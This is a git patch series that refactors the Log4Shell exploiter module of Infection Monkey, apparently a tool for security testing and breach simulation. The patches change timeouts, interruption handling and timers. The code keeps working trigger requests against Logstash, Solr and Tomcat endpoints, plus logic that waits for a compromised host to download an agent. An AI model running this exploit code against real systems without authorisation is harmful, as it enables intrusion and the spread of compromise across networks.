From 41278c8044a391e0ee03e21574c1c1b120830c08 Mon Sep 17 00:00:00 2001 From: vakaris_zilius Date: Mon, 21 Mar 2022 15:04:24 +0000 Subject: [PATCH 1/5] Agent: Make log4shell interruptable --- monkey/infection_monkey/exploit/log4shell.py | 35 +++++++++++++------ .../service_exploiters/logstash.py | 3 +- .../service_exploiters/solr.py | 3 +- .../service_exploiters/tomcat.py | 5 ++- 4 files changed, 32 insertions(+), 14 deletions(-) diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py index e04185d8a..a561efa8e 100644 --- a/monkey/infection_monkey/exploit/log4shell.py +++ b/monkey/infection_monkey/exploit/log4shell.py @@ -1,6 +1,7 @@ import logging import time +from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT from infection_monkey.exploit.log4shell_utils import ( LINUX_EXPLOIT_TEMPLATE_PATH, WINDOWS_EXPLOIT_TEMPLATE_PATH, @@ -12,7 +13,6 @@ from infection_monkey.exploit.log4shell_utils import ( from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.i_puppet.i_puppet import ExploiterResultData -from infection_monkey.model import DOWNLOAD_TIMEOUT as AGENT_DOWNLOAD_TIMEOUT from infection_monkey.model import DROPPER_ARG, LOG4SHELL_LINUX_COMMAND, LOG4SHELL_WINDOWS_COMMAND from infection_monkey.network.info import get_free_tcp_port from infection_monkey.network.tools import get_interface_to_target @@ -25,10 +25,8 @@ logger = logging.getLogger(__name__) class Log4ShellExploiter(WebRCE): _TARGET_OS_TYPE = ["linux", "windows"] _EXPLOITED_SERVICE = "Log4j" - SERVER_SHUTDOWN_TIMEOUT = 15 - REQUEST_TO_VICTIM_TIMEOUT = ( - 5 # Max time agent will wait for the response from victim in SECONDS - ) + SERVER_SHUTDOWN_TIMEOUT = LONG_REQUEST_TIMEOUT + REQUEST_TO_VICTIM_TIMEOUT = MEDIUM_REQUEST_TIMEOUT def _exploit_host(self) -> ExploiterResultData: self._open_ports = [ @@ -135,6 +133,11 @@ class Log4ShellExploiter(WebRCE): # because we don't know which services are running and on which ports for exploit in get_log4shell_service_exploiters(): for port in self._open_ports: + + if self._is_interrupted(): + self._set_interrupted() + return self.exploit_result + logger.debug( f'Attempting Log4Shell exploit on for service "{exploit.service_name}"' f"on port {port}" @@ -147,24 +150,26 @@ class Log4ShellExploiter(WebRCE): f"potential {exploit.service_name} service: {ex}" ) + if self._is_interrupted(): + self._set_interrupted() + return self.exploit_result + if self._wait_for_victim(): self.exploit_info["vulnerable_service"] = { "service_name": exploit.service_name, "port": port, } self.exploit_info["vulnerable_urls"].append(url) - self.exploit_result.exploitation_success = True self.exploit_result.propagation_success = True def _wait_for_victim(self) -> bool: - # TODO: Peridodically check to see if ldap or HTTP servers have exited with an error. If - # they have, return with an error. - victim_called_back = False - victim_called_back = self._wait_for_victim_to_download_java_bytecode() if victim_called_back: self._wait_for_victim_to_download_agent() + if self._is_interrupted(): + return False + return victim_called_back def _wait_for_victim_to_download_java_bytecode(self) -> bool: @@ -174,8 +179,12 @@ class Log4ShellExploiter(WebRCE): start_time, Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT ): if self._exploit_class_http_server.exploit_class_downloaded(): + self.exploit_result.exploitation_success = True return True + if self._is_interrupted(): + return False + time.sleep(1) logger.debug("Timed out while waiting for victim to download the java bytecode") @@ -184,10 +193,14 @@ class Log4ShellExploiter(WebRCE): def _wait_for_victim_to_download_agent(self): start_time = time.time() - while not self._victim_timeout_expired(start_time, AGENT_DOWNLOAD_TIMEOUT): + while not self._victim_timeout_expired(start_time, LONG_REQUEST_TIMEOUT): if self._agent_http_server_thread.downloads > 0: break + if self._is_interrupted(): + return + + # TODO: if the http server got an error we're waiting for nothing here time.sleep(1) @classmethod diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py index d347a0e4f..06943dd55 100644 --- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py +++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/logstash.py @@ -2,6 +2,7 @@ from logging import getLogger import requests +from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter from infection_monkey.model import VictimHost @@ -15,7 +16,7 @@ class LogStashExploit(IServiceExploiter): def trigger_exploit(payload: str, host: VictimHost, port: int): url = f"http://{host.ip_addr}:{port}/_node/hot_threads?human={payload}" try: - requests.get(url, timeout=5, verify=False) # noqa DUO123 + requests.get(url, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False) # noqa DUO123 except requests.ReadTimeout as e: logger.debug(f"Log4shell request failed {e}") diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py index a21d66a3a..26243279c 100644 --- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py +++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py @@ -2,6 +2,7 @@ from logging import getLogger import requests +from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter from infection_monkey.model import VictimHost @@ -15,7 +16,7 @@ class SolrExploit(IServiceExploiter): def trigger_exploit(payload: str, host: VictimHost, port: int): url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}" try: - requests.post(url, timeout=5, verify=False) # noqa DUO123 + requests.post(url, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False) # noqa DUO123 except requests.ReadTimeout as e: logger.debug(f"Log4shell request failed {e}") diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py index 68e0cfdf9..a01f5fecc 100644 --- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py +++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py @@ -2,6 +2,7 @@ from logging import getLogger import requests +from common.common_consts.timeouts import MEDIUM_REQUEST_TIMEOUT from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter from infection_monkey.model import VictimHost @@ -16,7 +17,9 @@ class TomcatExploit(IServiceExploiter): url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample" payload = {"dataname": "foo", "datavalue": payload} try: - requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123 + requests.post( # noqa DUO123 + url, data=payload, timeout=MEDIUM_REQUEST_TIMEOUT, verify=False + ) except requests.ReadTimeout as e: logger.debug(f"Log4shell request failed {e}") From 0f77d4ca37abb6015aa57f1da45f1c0fecc667e0 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Mon, 21 Mar 2022 11:46:55 -0400 Subject: [PATCH 2/5] Agent: Use Timer in Log4ShellExploiter --- monkey/infection_monkey/exploit/log4shell.py | 15 +++++---------- 1 file changed, 5 insertions(+), 10 deletions(-) diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py index a561efa8e..95dc773f4 100644 --- a/monkey/infection_monkey/exploit/log4shell.py +++ b/monkey/infection_monkey/exploit/log4shell.py @@ -18,6 +18,7 @@ from infection_monkey.network.info import get_free_tcp_port from infection_monkey.network.tools import get_interface_to_target from infection_monkey.utils.commands import build_monkey_commandline from infection_monkey.utils.monkey_dir import get_monkey_dir_path +from infection_monkey.utils.timer import Timer logger = logging.getLogger(__name__) @@ -173,11 +174,9 @@ class Log4ShellExploiter(WebRCE): return victim_called_back def _wait_for_victim_to_download_java_bytecode(self) -> bool: - start_time = time.time() + timer = Timer(Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT) - while not self._victim_timeout_expired( - start_time, Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT - ): + while not timer.is_expired(): if self._exploit_class_http_server.exploit_class_downloaded(): self.exploit_result.exploitation_success = True return True @@ -191,9 +190,9 @@ class Log4ShellExploiter(WebRCE): return False def _wait_for_victim_to_download_agent(self): - start_time = time.time() + timer = Timer(LONG_REQUEST_TIMEOUT) - while not self._victim_timeout_expired(start_time, LONG_REQUEST_TIMEOUT): + while not timer.is_expired(): if self._agent_http_server_thread.downloads > 0: break @@ -202,7 +201,3 @@ class Log4ShellExploiter(WebRCE): # TODO: if the http server got an error we're waiting for nothing here time.sleep(1) - - @classmethod - def _victim_timeout_expired(cls, start_time: float, timeout: int) -> bool: - return timeout < (time.time() - start_time) From 325c4368deb2e5340f7dddc8f63661d0d54045eb Mon Sep 17 00:00:00 2001 From: vakaris_zilius Date: Mon, 21 Mar 2022 16:09:43 +0000 Subject: [PATCH 3/5] Agent: Remove unnecessary interrupts from log4shell --- monkey/infection_monkey/exploit/log4shell.py | 20 +++++--------------- 1 file changed, 5 insertions(+), 15 deletions(-) diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py index 95dc773f4..d2e3ef2a5 100644 --- a/monkey/infection_monkey/exploit/log4shell.py +++ b/monkey/infection_monkey/exploit/log4shell.py @@ -18,6 +18,7 @@ from infection_monkey.network.info import get_free_tcp_port from infection_monkey.network.tools import get_interface_to_target from infection_monkey.utils.commands import build_monkey_commandline from infection_monkey.utils.monkey_dir import get_monkey_dir_path +from infection_monkey.utils.threading import interruptable_iter from infection_monkey.utils.timer import Timer logger = logging.getLogger(__name__) @@ -42,6 +43,8 @@ class Log4ShellExploiter(WebRCE): self._start_servers() try: self.exploit(None, None) + if self._is_interrupted(): + self._set_interrupted() return self.exploit_result finally: self._stop_servers() @@ -133,11 +136,8 @@ class Log4ShellExploiter(WebRCE): # Try to exploit all services, # because we don't know which services are running and on which ports for exploit in get_log4shell_service_exploiters(): - for port in self._open_ports: - - if self._is_interrupted(): - self._set_interrupted() - return self.exploit_result + intr_ports = interruptable_iter(self._open_ports, self.interrupt) + for port in intr_ports: logger.debug( f'Attempting Log4Shell exploit on for service "{exploit.service_name}"' @@ -151,10 +151,6 @@ class Log4ShellExploiter(WebRCE): f"potential {exploit.service_name} service: {ex}" ) - if self._is_interrupted(): - self._set_interrupted() - return self.exploit_result - if self._wait_for_victim(): self.exploit_info["vulnerable_service"] = { "service_name": exploit.service_name, @@ -168,9 +164,6 @@ class Log4ShellExploiter(WebRCE): if victim_called_back: self._wait_for_victim_to_download_agent() - if self._is_interrupted(): - return False - return victim_called_back def _wait_for_victim_to_download_java_bytecode(self) -> bool: @@ -196,8 +189,5 @@ class Log4ShellExploiter(WebRCE): if self._agent_http_server_thread.downloads > 0: break - if self._is_interrupted(): - return - # TODO: if the http server got an error we're waiting for nothing here time.sleep(1) From 684e723b09b34afbc5074a2a41b064568e8e532a Mon Sep 17 00:00:00 2001 From: vakaris_zilius Date: Mon, 21 Mar 2022 16:20:48 +0000 Subject: [PATCH 4/5] Agent: Fix timer usage in log4shell --- monkey/infection_monkey/exploit/log4shell.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py index d2e3ef2a5..da39198ad 100644 --- a/monkey/infection_monkey/exploit/log4shell.py +++ b/monkey/infection_monkey/exploit/log4shell.py @@ -167,7 +167,8 @@ class Log4ShellExploiter(WebRCE): return victim_called_back def _wait_for_victim_to_download_java_bytecode(self) -> bool: - timer = Timer(Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT) + timer = Timer() + timer.set(Log4ShellExploiter.REQUEST_TO_VICTIM_TIMEOUT) while not timer.is_expired(): if self._exploit_class_http_server.exploit_class_downloaded(): @@ -183,7 +184,8 @@ class Log4ShellExploiter(WebRCE): return False def _wait_for_victim_to_download_agent(self): - timer = Timer(LONG_REQUEST_TIMEOUT) + timer = Timer() + timer.set(LONG_REQUEST_TIMEOUT) while not timer.is_expired(): if self._agent_http_server_thread.downloads > 0: From 3cfa72f73199086bbf8481310117be0c008cd75f Mon Sep 17 00:00:00 2001 From: vakaris_zilius Date: Tue, 22 Mar 2022 06:57:33 +0000 Subject: [PATCH 5/5] Agent: Remove unreliable stop check in log4shell --- monkey/infection_monkey/exploit/log4shell.py | 3 --- 1 file changed, 3 deletions(-) diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py index da39198ad..25476ebc0 100644 --- a/monkey/infection_monkey/exploit/log4shell.py +++ b/monkey/infection_monkey/exploit/log4shell.py @@ -175,9 +175,6 @@ class Log4ShellExploiter(WebRCE): self.exploit_result.exploitation_success = True return True - if self._is_interrupted(): - return False - time.sleep(1) logger.debug("Timed out while waiting for victim to download the java bytecode")